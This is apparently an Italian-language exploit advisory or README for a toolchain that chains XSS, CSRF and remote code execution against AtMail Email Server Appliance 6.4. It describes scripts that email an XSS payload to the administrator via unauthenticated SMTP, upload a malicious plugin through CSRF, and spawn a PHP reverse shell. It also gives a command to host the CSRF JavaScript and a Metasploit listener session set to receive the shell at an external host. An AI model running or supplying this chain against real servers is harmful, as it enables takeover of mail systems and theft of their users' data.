
AtMail Email Server Appliance 6.4 - Toolchain di exploit (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
Disclaimer: questa toolchain di exploit è stata ispirata da EDB-ID 20009.
L'obiettivo di questa toolchain di exploit è sostituire EDB-ID 20009.
Vantaggi di questa toolchain rispetto all'exploit EDB-ID 20009:
Svantaggi dell'exploit EDB-ID 20009:
msfvenomInstalla i requisiti su ArchLinux:
$ sudo pacman -S metasploit tar ruby
File dell'exploit:
config.yml contiene la configurazione della toolchainexploit.sh il wrapper dell'exploit che deve essere eseguitoxss_mail.rb invierà l'email contenente la XSS all'amministratore tramite il server SMTP di Atmail (senza autenticazione).csrf_prepare.rb preparerà il payload CSRF (impostando il target e codificando l'archivio del plugin)rce_prepare.rb preparerà la RCE (generando la reverse shell e creando l'archivio del plugin)csrf_plugin.js il payload CSRF preparatonoraj/ contenente l'architettura del plugin non compressaLa toolchain di exploit richiede solo 2 passaggi manuali:
config.ymlexploit.shMa prima di lanciare l'attacco, un web server deve distribuire il file JavaScript CSRF e un listener di reverse shell deve essere in attesa della connessione. Quindi l'attacco sarà più simile a:
config.ymlcsrf_plugin.jsexploit.shEsempio di server HTTP in una riga:
$ ruby -run -e httpd . -p 8000
Esempio di listener per reverse shell:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run